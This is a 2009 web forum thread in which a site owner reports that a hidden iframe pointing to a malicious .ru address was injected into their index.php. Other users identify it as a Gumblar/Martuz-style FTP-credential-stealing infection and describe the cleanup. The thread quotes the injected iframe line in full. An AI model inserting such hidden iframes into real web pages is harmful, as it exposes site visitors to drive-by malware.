problem with a hack of my TL website

Printable View

10/13/2009, 20:15
vmulot

problem with a hack of my TL website

Hello there,
i used TL for 2 websites, and i had the same pb on both. one was with last version and the other is 2.7.1

i had blank page (i wasn't modifying or uploading files) , so i checked the source code and saw a few html lines like this :

Code:

<div style="display:none">qyzwbuhudmcueanzyzepqgmhqzdljzo<iframe width=364 height=882 src="http://check-your-iq.ru:8080/index.php" ></iframe></div>

i checked index.php of TL, and this line was at the end of the file.

do you know if there is a problem with TL security, or do you knwo this kind of hack and how to counter it ? (i asked to change the ftp and mysql password)

thanks !
10/13/2009, 21:08
qrczak

Re: problem with a hack of my TL website

Maybe I'm wrong but some time ago there was a virus which stole ftp passwords from TotalCommander and FilleZilla and next he connected to servers and added to index.php one line of code. What ftp client you use?
10/13/2009, 21:33
vmulot

Re: problem with a hack of my TL website

i'm using filezilla atm, my antivir (kaspersky) detect nothing i hope it's gone. :(
10/13/2009, 22:21
leo

Re: problem with a hack of my TL website

A couple of FileZilla hacks have been reported in the german forum, too. Use WinSCP if you can, it is the best open source FTP client on the market. :) And make sure to change ALL passwords if you have been hacked!
10/14/2009, 02:07
ramjet

Re: problem with a hack of my TL website

Quote:

i'm using filezilla atm, my antivir (kaspersky) detect nothing i hope it's gone

It won't be. :cry:
This thing is evil if turns out to be the one qrczak is talking about. It'll be all through your sites, and probably all other sites of anyone on your shared host (if you use shared hosting).

Download and run Avast antivirus http://www.avast.com/eng/download-avast-home.html, it should find a rootkit.
I'd also ftp transfer all your site files onto your computer, so Avast can run through the lot and tell you which ones are infected.This will help you figure out how to get rid of it.
Let us know what you find.
10/19/2009, 18:59
vmulot

Re: problem with a hack of my TL website

hi there,
i managed to clear my computer and websites infected.
it was a gumblar/martuz like virus, like you said, i maybe had a trojan which grabbed my ftp passowrds and then modified my index, default... pages.
i did a online virus scan with trend micros, i corrected my corrupted files (searching the <iframe> tag is nice :p) and then change the ftp password and everything is ok now :)

thanks for help.